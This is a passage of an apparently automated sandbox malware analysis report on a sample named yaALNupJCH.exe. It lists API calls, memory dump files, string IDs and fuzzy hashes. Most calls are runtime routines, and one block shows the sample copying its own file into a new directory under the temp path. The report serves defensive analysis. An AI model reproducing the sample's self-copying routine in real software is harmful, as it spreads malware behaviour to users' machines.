                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$___from_strstr_to_strchr
                                                                                                • String ID:
                                                                                                • API String ID: 3409252457-0
                                                                                                • Opcode ID: fd7c3fffa32b75272b1854a7c5f07dd0d21b9871d9f355bd1c629eb88af3bf16
                                                                                                • Instruction ID: eda9318d4e0493f0af14033eb7310e0f0bdfa2bed600b80f902073e0927fec86
                                                                                                • Opcode Fuzzy Hash: fd7c3fffa32b75272b1854a7c5f07dd0d21b9871d9f355bd1c629eb88af3bf16
                                                                                                • Instruction Fuzzy Hash: A4515871904209AFDB20AFB5D8C2F6E7BB8EF05310F14456EE52D97182EB358A41EB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                • API String ID: 0-537541572
                                                                                                • Opcode ID: e12b918d41bab609469a3115c0590793d90d94ea28ab80aeb452c0065a4a777a
                                                                                                • Instruction ID: 1f65caee0070b877db2fb54462239390b0138990937a6a58556f8fabfa8ffa9b
                                                                                                • Opcode Fuzzy Hash: e12b918d41bab609469a3115c0590793d90d94ea28ab80aeb452c0065a4a777a
                                                                                                • Instruction Fuzzy Hash: 8021D571A02220EBDB235B25CC48F6E7758DF457A0F250369ED22A72D0DA30EE0197E5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CCD338: _free.LIBCMT ref: 00CCD35D
                                                                                                • _free.LIBCMT ref: 00CCD3BE
                                                                                                  • Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
                                                                                                  • Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979
                                                                                                • _free.LIBCMT ref: 00CCD3C9
                                                                                                • _free.LIBCMT ref: 00CCD3D4
                                                                                                • _free.LIBCMT ref: 00CCD428
                                                                                                • _free.LIBCMT ref: 00CCD433
                                                                                                • _free.LIBCMT ref: 00CCD43E
                                                                                                • _free.LIBCMT ref: 00CCD449
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: a07fb07f9ed11dad217a386fc2e13d4ea943475430fdfd0535cac9ac8b732c12
                                                                                                • Instruction ID: cbde20585bd5b06534af7157450b9e4fdfbd109f8aa369ef0c9eb7937643c0f8
                                                                                                • Opcode Fuzzy Hash: a07fb07f9ed11dad217a386fc2e13d4ea943475430fdfd0535cac9ac8b732c12
                                                                                                • Instruction Fuzzy Hash: F1115171540B88AADA20B7B0CD47FDBB7BC9F00700F444D2DF69A6A0A2DA75F506A752
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetConsoleCP.KERNEL32(?,00CB48D0,00000000), ref: 00CCEB51
                                                                                                • __fassign.LIBCMT ref: 00CCED30
                                                                                                • __fassign.LIBCMT ref: 00CCED4D
                                                                                                • WriteFile.KERNEL32(?,00CB48D0,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CCED95
                                                                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CCEDD5
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CCEE81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 4031098158-0
                                                                                                • Opcode ID: 8b3bce1d7494aaf8ee9bc33d601163fb79db8dc00654b7f27fa25a0c501bfd9c
                                                                                                • Instruction ID: 185fd0f332119e06065a952d780315ddb6ac65f8e7eb9f168862a0c208440580
                                                                                                • Opcode Fuzzy Hash: 8b3bce1d7494aaf8ee9bc33d601163fb79db8dc00654b7f27fa25a0c501bfd9c
                                                                                                • Instruction Fuzzy Hash: 45D16971D002589FCB15CFA8C980EEDBBB5BF49314F28416EE856BB342D731AA46CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,00CC372B,00CC3599,00CC2CB5), ref: 00CC3742
                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CC3750
                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC3769
                                                                                                • SetLastError.KERNEL32(00000000,00CC372B,00CC3599,00CC2CB5), ref: 00CC37BB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                • String ID:
                                                                                                • API String ID: 3852720340-0
                                                                                                • Opcode ID: e372c7272e9813478823a2fcbe7fcbd9e04e7a476bee46ad2cd154d79b735856
                                                                                                • Instruction ID: dc8aa67b92e72b64679542a0f475a74fdcda9298dc4fdd92ca2881420000e503
                                                                                                • Opcode Fuzzy Hash: e372c7272e9813478823a2fcbe7fcbd9e04e7a476bee46ad2cd154d79b735856
                                                                                                • Instruction Fuzzy Hash: 2F01B1B2609792AFE6142675FDDAF5B27A8EB06774720822EF424890F2EE116F006344
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • C:\Users\user\Desktop\yaALNupJCH.exe, xrefs: 00CCBF66
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C:\Users\user\Desktop\yaALNupJCH.exe
                                                                                                • API String ID: 0-3763621502
                                                                                                • Opcode ID: d2ed949b186fdfc979583f5e39890ed5909470de899ac4ea3bb91c2e01c8eafc
                                                                                                • Instruction ID: aee02ef49978014f96827d0d0bf376534454e40adbe585ea3c207807a657c3a7
                                                                                                • Opcode Fuzzy Hash: d2ed949b186fdfc979583f5e39890ed5909470de899ac4ea3bb91c2e01c8eafc
                                                                                                • Instruction Fuzzy Hash: 39219D71604209EFDB20AFA1DC81F2B77ADEF443A8B10452CF92996291E731ED419BA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _wcsrchr
                                                                                                • String ID: .bat$.cmd$.com$.exe
                                                                                                • API String ID: 1752292252-4019086052
                                                                                                • Opcode ID: 3ea52b52af2fb832731994d779af175946012ae03212f76866b1c507b6647f2b
                                                                                                • Instruction ID: 86941417921903d24e2c735264c716ba234c8beb55cd261c2ca8a4969ff0fc96
                                                                                                • Opcode Fuzzy Hash: 3ea52b52af2fb832731994d779af175946012ae03212f76866b1c507b6647f2b
                                                                                                • Instruction Fuzzy Hash: 7501267B614E15652624606DEC02F3F57988B91BB8726002FF968F73C2EE94FE8251D4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 0-2084034818
                                                                                                • Opcode ID: 1d0df2327155258298668801caec56fa60931636a43f378b7c0f2a86dbe86275
                                                                                                • Instruction ID: cdda17936324947e2bd70ff6501ccbe15f467590b053c277106c794572e69b87
                                                                                                • Opcode Fuzzy Hash: 1d0df2327155258298668801caec56fa60931636a43f378b7c0f2a86dbe86275
                                                                                                • Instruction Fuzzy Hash: D511C831A01665FBCB229BE5FC44F1E7758AF05760B158159ECA7A72D0D730EF10A6E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00CC4AE8,00CC814B,?,00CC4AB0,00CC5036,?,00CC814B), ref: 00CC4B08
                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC4B1B
                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00CC4AE8,00CC814B,?,00CC4AB0,00CC5036,?,00CC814B), ref: 00CC4B3E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 035d9223254fe41ec9c440c4123476bcd5d8fac94ba2cee0cff3ecf025f29688
                                                                                                • Instruction ID: 426fd54d3ad1dbdd7f1014929ad5a0b302cd262f2bdff15235838a320106c2ec
                                                                                                • Opcode Fuzzy Hash: 035d9223254fe41ec9c440c4123476bcd5d8fac94ba2cee0cff3ecf025f29688
                                                                                                • Instruction Fuzzy Hash: 93F0A030602619FBDB25AB51DD1AFDEBB79EB00756F104066F911A21A0CF74CF00DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(014D1E88,014D1E88,?,7FFFFFFF,?,?,00CD3D45,014D1E88,014D1E88,?,014D1E88,?,?,?,?,014D1E88), ref: 00CD3B2C
                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD3BE2
                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD3C78
                                                                                                • __freea.LIBCMT ref: 00CD3CE3
                                                                                                • __freea.LIBCMT ref: 00CD3CEF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __alloca_probe_16__freea$Info
                                                                                                • String ID:
                                                                                                • API String ID: 2330168043-0
                                                                                                • Opcode ID: 367aaadf189f49b627d938ea2443066253b6a03fc6f9d3459a7188300a7a9510
                                                                                                • Instruction ID: 76de982beeed2ae9460e2ad174b3520c45739204e051398234e1a144de85d0cf
                                                                                                • Opcode Fuzzy Hash: 367aaadf189f49b627d938ea2443066253b6a03fc6f9d3459a7188300a7a9510
                                                                                                • Instruction Fuzzy Hash: 85811672A10299ABDF209F54C881EEF7BB5AF49710F18015BEA14B7341D725CF40DBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD2378
                                                                                                • __alloca_probe_16.LIBCMT ref: 00CD243E
                                                                                                • __freea.LIBCMT ref: 00CD24AA
                                                                                                  • Part of subcall function 00CC8E3A: RtlAllocateHeap.NTDLL(00000000,00CC0FAC,?,?,00CC2609,00CC0FAC,?,00CC13D8,E800CE42,777D6490), ref: 00CC8E6C
                                                                                                • __freea.LIBCMT ref: 00CD24B3
                                                                                                • __freea.LIBCMT ref: 00CD24D6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1423051803-0
                                                                                                • Opcode ID: 9a70c1ababa350f50bf119b30e264b46ab0cf187da7923bd028fbf24d3ce0159
                                                                                                • Instruction ID: 8a14cee48cf2c0debc55a2d8e9f821d7c847a7b156e6bc3177486657c944f374
                                                                                                • Opcode Fuzzy Hash: 9a70c1ababa350f50bf119b30e264b46ab0cf187da7923bd028fbf24d3ce0159
                                                                                                • Instruction Fuzzy Hash: 6F51E172600216ABDF219F64CC81FBF36A9DF94754F15412AFE18A7350EB38DE5096A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00CCD2E7
                                                                                                  • Part of subcall function 00CC8951: HeapFree.KERNEL32(00000000,00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000), ref: 00CC8967
                                                                                                  • Part of subcall function 00CC8951: GetLastError.KERNEL32(00000000,?,00CCD362,00000000,00000000,00000000,E800CE41,?,00CCD389,00000000,00000007,00000000,?,00CCD78B,00000000,00000000), ref: 00CC8979
                                                                                                • _free.LIBCMT ref: 00CCD2F9
                                                                                                • _free.LIBCMT ref: 00CCD30B
                                                                                                • _free.LIBCMT ref: 00CCD31D
                                                                                                • _free.LIBCMT ref: 00CCD32F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: f5333d60b850bfe1c6d5cd7f7bf0796ef816a372ebf786af5d0af39b683d8508
                                                                                                • Instruction ID: 661d7600a50076d8fe7d7fda977e0184b5958523795b63f8e5c09ffac5bfe99a
                                                                                                • Opcode Fuzzy Hash: f5333d60b850bfe1c6d5cd7f7bf0796ef816a372ebf786af5d0af39b683d8508
                                                                                                • Instruction Fuzzy Hash: C3F0127350829577C620DF65E9CAF2A73FDAA007107680D1DF059DB691CF30FE854665
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID: *?
                                                                                                • API String ID: 269201875-2564092906
                                                                                                • Opcode ID: fd1e0e354beaa488c2f21d300c3ad5031be2a8db77353ec4815969317262a2b5
                                                                                                • Instruction ID: e7514e84bd23bae6fa9768825e37cd913a495a1e8153538b57ef323cd696b15a
                                                                                                • Opcode Fuzzy Hash: fd1e0e354beaa488c2f21d300c3ad5031be2a8db77353ec4815969317262a2b5
                                                                                                • Instruction Fuzzy Hash: 04610A75D002199FCB14DFA9C882AEEBBF5EF48310F24816EE855E7340D731AE419B90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00CB4210: GetVersionExW.KERNEL32(0000011C,?,777D6490), ref: 00CB4267
                                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 00CB85D7
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00CB88D9
                                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,?,?), ref: 00CB8A1C
                                                                                                • CopyFileA.KERNEL32 ref: 00CB8A49
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CopyCreateDirectoryModuleNamePathTempVersion
                                                                                                • String ID:
                                                                                                • API String ID: 2921419681-0
                                                                                                • Opcode ID: 028aeedebee3abb872d2edabea83328a9dffb9cebf49c3ed5bf535fbdc402797
                                                                                                • Instruction ID: ea72b35fa19d5273630498d748d10e8c7de8553821315f01a12024f445a9ef00
                                                                                                • Opcode Fuzzy Hash: 028aeedebee3abb872d2edabea83328a9dffb9cebf49c3ed5bf535fbdc402797
                                                                                                • Instruction Fuzzy Hash: DCD1E971D001089BEF08EB64DC9ABEDBB3AAF42304F54411CF445A72D6EF359A89DB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strrchr
                                                                                                • String ID:
                                                                                                • API String ID: 3213747228-0
                                                                                                • Opcode ID: c3520e6fa4c543582bc0414abcdd52856e812a60995d276b06546b24adf838ec
                                                                                                • Instruction ID: 0bf8f05058927b39290233d270046819688167186ddedb903eaacdc1ff971e27
                                                                                                • Opcode Fuzzy Hash: c3520e6fa4c543582bc0414abcdd52856e812a60995d276b06546b24adf838ec
                                                                                                • Instruction Fuzzy Hash: 94B144729006459FDB118FA8C892FBEBBF5EF45340F1841AEE861DB241D7359E02CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00CD29FE
                                                                                                • _free.LIBCMT ref: 00CD2A27
                                                                                                • SetEndOfFile.KERNEL32(00000000,00CCE60E,00000000,00CC87EE,?,?,?,?,?,?,?,00CCE60E,00CC87EE,00000000), ref: 00CD2A59
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00CCE60E,00CC87EE,00000000,?,?,?,?,00000000), ref: 00CD2A75
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1399093303.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1399088868.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399103677.0000000000CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399110009.0000000000CE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399113833.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1399119847.0000000000CEA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_cb0000_yaALNupJCH.jbxd
                                                                                                Yara matches
